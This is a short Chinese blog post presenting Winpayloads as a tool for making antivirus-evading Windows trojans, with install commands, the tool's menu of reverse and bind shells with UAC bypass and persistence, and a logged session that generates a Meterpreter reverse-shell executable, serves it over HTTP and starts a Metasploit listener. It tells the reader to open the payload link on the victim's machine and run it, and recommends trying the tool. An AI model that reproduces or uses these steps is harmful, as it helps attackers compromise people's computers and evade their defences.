首页 公告 项目 RSS

制作免杀windows木马(Winpayloads )

July 11, 2017 本文有 548 个字 需要花费 2 分钟阅读

工具链接

https://github.com/nccgroup/Winpayloads

简介

Winpayloads 是一款制作免杀windows木马的工具

安装

下载
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads
安装
chmod +x setup.sh
./setup.sh
安装完后启动的样子



                                                                                                          _       ___       ____              __                __
                                                                                                         | |     / (_)___  / __ \____ ___  __/ /___  ____ _____/ /____
                                                                                                         | | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __  / ___/
                                                                                                         | |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__  )
                                                                                                         |__/|__/_/_/ /_/_/    \__,_/\__, /_/\____/\__,_/\__,_/____/
                                                                                                                                    /____/NCCGroup - CharlieDean
===================================================================================================================================Main Menu==================================================================================================================================
                                                                                                  1: Windows Reverse Shell                                                                                                  
                                                                                                  2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]                                                                                                 
                                                                                                  3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]                                                                                                  
                                                                                                  4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]                                                                                                 
                                                                                                  5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]                                                                                                 
                                                                                                  ps: PowerShell Menu                                                                                                 
                                                                                                  stager: Powershell Interpreter Stager                                                                                                 
                                                                                                  clients: Connected Interpreter Clients
                                                                                                 
                                                                                                  ?: Print Detailed Help                                                                                                  
                                                                                                  back: Main Menu                                                                                                 
                                                                                                  exit: Exit                                                                                                  
==============================================================================================================================================================================================================================================================================
Main Menu > 

使用

比如你要生成一个Windows Meterpreter Reverse Shell

Main Menu > 2

[*] Press Enter For Default Port(4444)
[*] Port> 4444

[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP> 
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444

[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
- Genera              
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe

[*] Upload To Local Websever or (p)sexec? [y]/p/n: y

[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Starting the payload handler...
msf exploit(handler) > 

在受害者机器上打开 http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe,之后运行就可以了

评价

其实不能做到完全免杀,可能是因为工具出来太久的缘故,但是生成木马的方式还是挺简单的值得一试